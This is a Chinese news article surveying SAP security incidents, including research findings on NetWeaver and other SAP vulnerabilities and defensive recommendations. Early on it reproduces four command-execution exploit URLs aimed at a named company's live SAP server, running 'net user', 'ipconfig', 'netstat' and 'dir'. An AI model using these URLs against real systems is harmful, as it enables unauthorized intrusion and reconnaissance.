搜索歷史

熱搜詞

原創(chuàng)

活動

創(chuàng)新2.0

I T

產(chǎn)業(yè)

當前位置：首頁 >互聯(lián)網(wǎng)?IT > 管理信息化 > 軟件 > ERP > 正文

細數(shù)SAP管理系統(tǒng)這些年的安全事件

來源：人稱T客：趙恒 2015-05-18 14:30:54

在前些年我們不太注重企業(yè)管理的安全，但是隨著斯諾登事件的爆發(fā)，國家開始對安全可控進行重新定義，安全問題一夜之間成為全民熱議的焦點，作為全球知名的管理軟件廠商SAP，卻在系統(tǒng)上安全漏洞不斷。

上個月SAP系統(tǒng)又出事兒，一安全博客爆出，中國華能集團公司電子商務(wù)網(wǎng)站系統(tǒng)存在漏洞，訪問url：http://srm.chng.com.cn/HnSrmWebO/index.jsp，該網(wǎng)站采用sap系統(tǒng)，由于未及時更新補丁，導(dǎo)致存在命令執(zhí)行漏洞，如下

構(gòu)造語句可查看網(wǎng)站服務(wù)器上的系統(tǒng)用戶賬號信息：http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20net%20user

查看服務(wù)器ip地址信息

http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20ipconfig%20/all

查看服務(wù)器上端口開放信息：http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20netstat%20-an

查看系統(tǒng)磁盤上目錄文件信息：

http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20dir%20c:

全球95%的SAP企業(yè)管理系統(tǒng)存在安全漏洞可能導(dǎo)致嚴重的數(shù)據(jù)泄露

根據(jù)Onapsis的調(diào)查報告，全世界超過25萬企業(yè)因SAP系統(tǒng)中存在的一系列安全漏洞而受到影響，可能導(dǎo)致嚴重的企業(yè)數(shù)據(jù)泄露。SAP是世界上最受歡迎的企業(yè)應(yīng)用軟件企業(yè)和解決方案提供商，為85%以上的全球500強企業(yè)和190個國家的282,000+家客戶提供解決方案。

漏洞原因

最近在對SAP解決方案提供商進行的一項研究顯示，超過95%的企業(yè)SAP存在嚴重的安全問題，這些問題將它們置于網(wǎng)絡(luò)攻擊風險之中并可能導(dǎo)致嚴重的數(shù)據(jù)泄露。影響包括98%的100個最有價值的品牌在內(nèi)，全世界超過250000個SAP業(yè)務(wù)客戶都因SAP系統(tǒng)中的一系列漏洞而暴露在網(wǎng)絡(luò)攻擊之下。

Onapsis首席執(zhí)行官Mariano Nunez說：

“最令人驚訝的是，因為SAP操作團隊和IT安全團隊之間的責任差距，大多數(shù)公司的SAP網(wǎng)絡(luò)安全都面臨著威脅。事實上，應(yīng)用的大多數(shù)補丁都與安全無關(guān)、發(fā)布過遲或者引入了進一步的操作風險。”

該研究還報告說，在2014年SAP發(fā)布了391個安全補丁，而它們中的50%以上都被評定為高風險漏洞。

攻擊方式及影響范圍

針對SAP應(yīng)用程序的主要網(wǎng)絡(luò)攻擊(也就是系統(tǒng)弱點)分為以下幾類：

1. 核心網(wǎng)絡(luò)：執(zhí)行遠程功能的模塊。

2. 數(shù)據(jù)倉庫：為了獲取或修改SAP數(shù)據(jù)庫中的信息，利用SAP RFC網(wǎng)關(guān)中的漏洞執(zhí)行管理員權(quán)限指令。

3. 門戶網(wǎng)站攻擊：利用漏洞創(chuàng)建J2EE后門賬戶，以訪問SAP門戶和其他內(nèi)部系統(tǒng)。

報告中提供了針對SAP系統(tǒng)最常見的三種網(wǎng)絡(luò)攻擊的細節(jié)信息，這些攻擊向量使得黑客可以入侵SAP系統(tǒng)并能夠訪問公司數(shù)據(jù)的應(yīng)用程序。經(jīng)過專家研究確認，網(wǎng)絡(luò)攻擊將會嚴重影響以下關(guān)鍵業(yè)務(wù)進程：

1. 在SAP系統(tǒng)之間使用Pivoting，造成客戶信息和信用卡信息泄漏。

2. 客戶和供應(yīng)商門戶攻擊。

3. 通過SAP私有協(xié)議對數(shù)據(jù)倉庫發(fā)起攻擊。

根據(jù)Nunez所說，SAP HANA應(yīng)該對新增加的450%的安全補丁負責：

“這一趨勢不僅僅是持續(xù)的，而是隨著SAP HANA更加惡化，因為SAP HANA導(dǎo)致新的安全補丁增加了450%。因為SAP HANA位于SAP生態(tài)系統(tǒng)的中心，所以存儲在SAP平臺的數(shù)據(jù)現(xiàn)在必須同時在云端和前端進行保護。”

安全措施

該報告還提供了以下行動計劃，用以提高SAP系統(tǒng)的安全級別：

1. 獲取基于SAP資產(chǎn)的可視化功能，以確定“風險價值”。

2. 通過持續(xù)監(jiān)控以防止安全性和遵從性問題。

3. 檢測并應(yīng)對新威脅、攻擊或用戶異常表現(xiàn)作為攻擊的指示器。

為了保護SAP軟件，遵循任何SAP安全記錄和監(jiān)控內(nèi)部體系結(jié)構(gòu)非常重要，這能夠有效預(yù)防一些安全問題。

而SAP存在安全問題并非今天就有，在2013年SAP就被俄羅斯安全研究人員爆出Netweaver漏洞導(dǎo)致用戶表泄露，該漏洞可能導(dǎo)致攻擊者獲取中央用戶管理表的訪問權(quán)。

作為一套面向服務(wù)的集成平臺方案，SAP NetWeaver此次遭遇的漏洞細節(jié)(CVE-2014-3787)由安全企業(yè)PT Security公司嚴格保密，這家安全廠商會定期對SAP套件進行檢測。

中央用戶管理功能旨在簡化對由不同客戶端托管的多個用戶賬戶的管理流程。SAP公司是目前人氣最高的商務(wù)應(yīng)用程序供應(yīng)商之一，財富五百強企業(yè)中有四分之三使用該公司的產(chǎn)品。

Dmitry Gutsko指出，此次曝光的敏感信息泄露漏洞會影響到NetWeaver 7.20以及更早版本。

“一旦成功利用此漏洞，攻擊者將能夠通過附屬系統(tǒng)讀取來自SAP中央用戶管理體系中的任何表信息，這可能會導(dǎo)致存儲在全部CUA系統(tǒng)中的用戶數(shù)據(jù)遭到泄露，”Gutso在一篇博文中解釋道。

建議用戶利用最新發(fā)布的NetWeaver安全補丁來修復(fù)這一漏洞。

SAP用戶一直對該公司部署方案的更新與安全保護機制抱怨不休。去年ERP Scan公司創(chuàng)始人Alexander Polyakov曾經(jīng)發(fā)現(xiàn)，當時成百上千家企業(yè)在運行著存在漏洞的陳舊SAP產(chǎn)品版本，而且內(nèi)部信息完全暴露在公共互聯(lián)網(wǎng)之下。

Polyakov發(fā)現(xiàn)不少客戶所運行的NetWeaver j2EE版本當中都包含關(guān)鍵性漏洞，可能允許攻擊者在無需認證的前提下執(zhí)行操作命令。

另外這家安全公司還報告稱SAP NetWeaver的GRMGApp中存在關(guān)鍵性XML External Entity(簡稱XXE)漏洞，這相當于為未經(jīng)授權(quán)的訪問敞開了便利之門。

而在此時不斷爆出安全問題，對于SAP在企業(yè)選擇會受到一定影響，特別是在去IOE行動從概念走向落地的當下，SAP不能只有價格最高，在安全防范上也在配得起他高大上的價格才行。

編輯：趙明飛

關(guān)鍵字： SAP 管理系統(tǒng) ERP